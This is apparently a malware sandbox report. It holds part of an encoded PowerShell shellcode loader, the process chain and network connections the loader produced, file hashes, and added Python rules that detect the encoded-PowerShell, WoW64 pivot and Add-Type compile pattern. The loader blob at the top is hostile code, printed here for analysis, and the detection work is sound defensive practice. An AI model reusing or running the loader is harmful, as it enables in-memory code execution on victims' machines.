AMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD
0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc 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
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES421A.tmp" "c:\Users\Admin\AppData\Local\Temp\xstaiujp\CSC1E2C45E74E1F4F0B976E67B55DED858.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| N/A | 192.168.1.8:8080 | N/A | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/2028-0-0x0000000000480000-0x000000000048A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xpiu0x5k.1vs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2560-11-0x000001D2E5C10000-0x000001D2E5C32000-memory.dmp
memory/2028-6-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2560-12-0x000001D2FE350000-0x000001D2FE360000-memory.dmp
memory/2560-13-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2044-14-0x00000000744D0000-0x0000000074C80000-memory.dmp
memory/2044-15-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/2044-16-0x0000000004D30000-0x0000000004D66000-memory.dmp
memory/2044-17-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/2044-18-0x00000000053A0000-0x00000000059C8000-memory.dmp
memory/2044-19-0x0000000005320000-0x0000000005342000-memory.dmp
memory/2044-20-0x0000000005B40000-0x0000000005BA6000-memory.dmp
memory/2044-21-0x0000000005C20000-0x0000000005C86000-memory.dmp
memory/2044-31-0x0000000005DD0000-0x0000000006124000-memory.dmp
memory/2044-32-0x00000000062D0000-0x00000000062EE000-memory.dmp
memory/2044-33-0x0000000006310000-0x000000000635C000-memory.dmp
memory/2044-34-0x0000000007B20000-0x000000000819A000-memory.dmp
memory/2044-35-0x0000000006800000-0x000000000681A000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.cmdline
| MD5 | ca26538a1bd0155e961ad9499ae7df44 |
| SHA1 | 7838e6c383373ca346bc74c53616abac847dd96e |
| SHA256 | 9aced52680c94f0adfc8980fe01859dda1c8dfa916b09b416cd18010294126d0 |
| SHA512 | 4698eec2df32c7016857cf6556753a76ccd18a4fc465d0c4efe6ab7c781f1367de327c3f6db8d6109b271148d4fc0b71eba0350dd87b631183b48ed1ab477e11 |
\??\c:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\xstaiujp\CSC1E2C45E74E1F4F0B976E67B55DED858.TMP
| MD5 | 220d4f9d2df838a9a5735566af7026c1 |
| SHA1 | cc5eec515df1a0170bc39e4365df1a8f0dcd5925 |
| SHA256 | de45a21e579f1cc44ccb9c75c0db15acbe2f5cbe876ca8a5e506374340ef80f0 |
| SHA512 | a9669541a473ccf87d48249bfa681a06b1df3a23a5447798a54b8231d5f01ef33d938bb821eef7d30a9230f451c762f8ea0acbe938082915b288595ccdb65784 |
C:\Users\Admin\AppData\Local\Temp\RES421A.tmp
| MD5 | 4a7e8500a99ba1aa0b03f7536e7686f8 |
| SHA1 | eed41e343fd1b0a1c046873bd0eb271775dac6b2 |
| SHA256 | 181bcbc314218d116b3e2c093e38037bafe58723cec28971d988e60f3c8a4dbf |
| SHA512 | 5476ec59773ab32a06761a86c2e9b4d3e0ecb8d92bb40a130561bf48b8068b958f0c5da0602d034dc57f6d965259d7c330aac5960bb82cfe2e6b6d50b2268ae6 |
C:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.dll
| MD5 | 649ff78c94c292091ebec490f52d4f50 |
| SHA1 | e5e16d301428ba87f00bb1b568756eabf7524b2a |
| SHA256 | 20b20b942a3e6508d183b4a3035201d2c21875803889f6469538631fc5ff9f54 |
| SHA512 | 25c2cd8c720f7090bd90ac157bd9dc9bb0069f9cc0b9597db494351d792cde1ec90643b9ced39363abad281a94134f366dfc3744023bfdeac827cb0ba1991cfb |
memory/2044-48-0x0000000006870000-0x0000000006878000-memory.dmp
memory/2044-50-0x00000000074B0000-0x00000000074B1000-memory.dmp
memory/2044-51-0x00000000074B0000-0x00000000074B1000-memory.dmp
memory/2028-52-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2560-53-0x000001D2FE350000-0x000001D2FE360000-memory.dmp
memory/2560-54-0x000001D2FE350000-0x000001D2FE360000-memory.dmp
memory/2560-55-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2044-57-0x00000000744D0000-0x0000000074C80000-memory.dmp
memory/2044-58-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
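Both detonations record the same process chain: the dropped .exe runs cmd.exe, which runs a hidden `-EncodedCommand` PowerShell, which runs the syswow64 PowerShell with `-enc`, which runs csc.exe (the Add-Type compile) and then cvtres.exe. The rules below are an added example, not the sandbox's signatures or the page's own code: three process-tree checks run over constructed process-creation events. The image paths and command-line shapes are taken from the process lists above; the pids and ppids, the dummy base64 blobs and the two benign explorer.exe/powershell.exe events are assumptions added to show the rules stay quiet on ordinary PowerShell use.

```python
import base64
import re

# Constructed process-creation events mirroring the behavioral2 process list. Pids and
# ppids are made up (the page gives no parent/child ids), the encoded blobs are dummy
# base64 of the right shape, and the last two events are benign noise.
SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe")
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
CVTRES = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
DUMMY_B64 = base64.b64encode(b"x" * 120).decode()  # 160 chars, stands in for the real blob

EVENTS = [
    {"pid": 100, "ppid": 1, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "C:\\Windows\\system32\\cmd.exe /c powershell -window hidden -EncodedCommand " + DUMMY_B64},
    {"pid": 300, "ppid": 200, "image": PS64,
     "cmdline": "powershell -window hidden -EncodedCommand " + DUMMY_B64},
    {"pid": 400, "ppid": 300, "image": PS32, "cmdline": f'"{PS32}" -enc ' + DUMMY_B64},
    {"pid": 500, "ppid": 400, "image": CSC,
     "cmdline": f'"{CSC}" /noconfig /fullpaths @"C:\\Users\\Admin\\AppData\\Local\\Temp\\xstaiujp\\xstaiujp.cmdline"'},
    {"pid": 600, "ppid": 500, "image": CVTRES,
     "cmdline": f'{CVTRES} /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\\Users\\Admin\\AppData\\Local\\Temp\\RES421A.tmp"'},
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 51, "ppid": 50, "image": PS64, "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

# -e/-ec/-enc/-EncodedCommand followed by a long base64 blob; -w/-window/-windowstyle hidden
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/]{100,}={0,2}", re.I)
HIDDEN_FLAG = re.compile(r"-w\w*\s+hidden", re.I)


def is_powershell(image):
    return image.lower().endswith("\\powershell.exe")


def is_wow64(image):
    return "\\syswow64\\" in image.lower()


def detect(events):
    """Return (rule, pid) findings for the loader chain recorded on the page."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, parent = e["image"], by_pid.get(e["ppid"])
        # Rule 1: PowerShell started with an encoded command (hidden window noted separately)
        if is_powershell(img) and ENC_FLAG.search(e["cmdline"]):
            rule = "encoded_powershell"
            if HIDDEN_FLAG.search(e["cmdline"]):
                rule += "_hidden"
            findings.append((rule, e["pid"]))
        # Rule 2: 64-bit PowerShell spawning the 32-bit build, needed to run x86 shellcode in-process
        if (is_powershell(img) and is_wow64(img) and parent
                and is_powershell(parent["image"]) and not is_wow64(parent["image"])):
            findings.append(("wow64_powershell_pivot", e["pid"]))
        # Rule 3: Add-Type compiles its C# P/Invoke stub with csc.exe (cvtres.exe follows from csc)
        if img.lower().endswith("\\csc.exe") and parent and is_powershell(parent["image"]):
            findings.append(("powershell_addtype_compile", e["pid"]))
    return findings


def root_of(events, pid):
    """Walk ppid links back to the outermost known ancestor (the dropped sample here)."""
    by_pid = {e["pid"]: e for e in events}
    while pid in by_pid and by_pid[pid]["ppid"] in by_pid:
        pid = by_pid[pid]["ppid"]
    return by_pid[pid]["image"] if pid in by_pid else None


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:28s} pid={pid} root={root_of(EVENTS, pid)}")
```

The three rules fire on three different processes (300, 400, 500) and each one walks back to the same root, which is the grouping an analyst wants when the sandbox only lists the processes flat. Rule 2 is the most specific of the three: a System32 PowerShell launching the syswow64 PowerShell has few legitimate causes and matches the `[IntPtr]::Size -eq 8` branch of the decoded outer stage exactly.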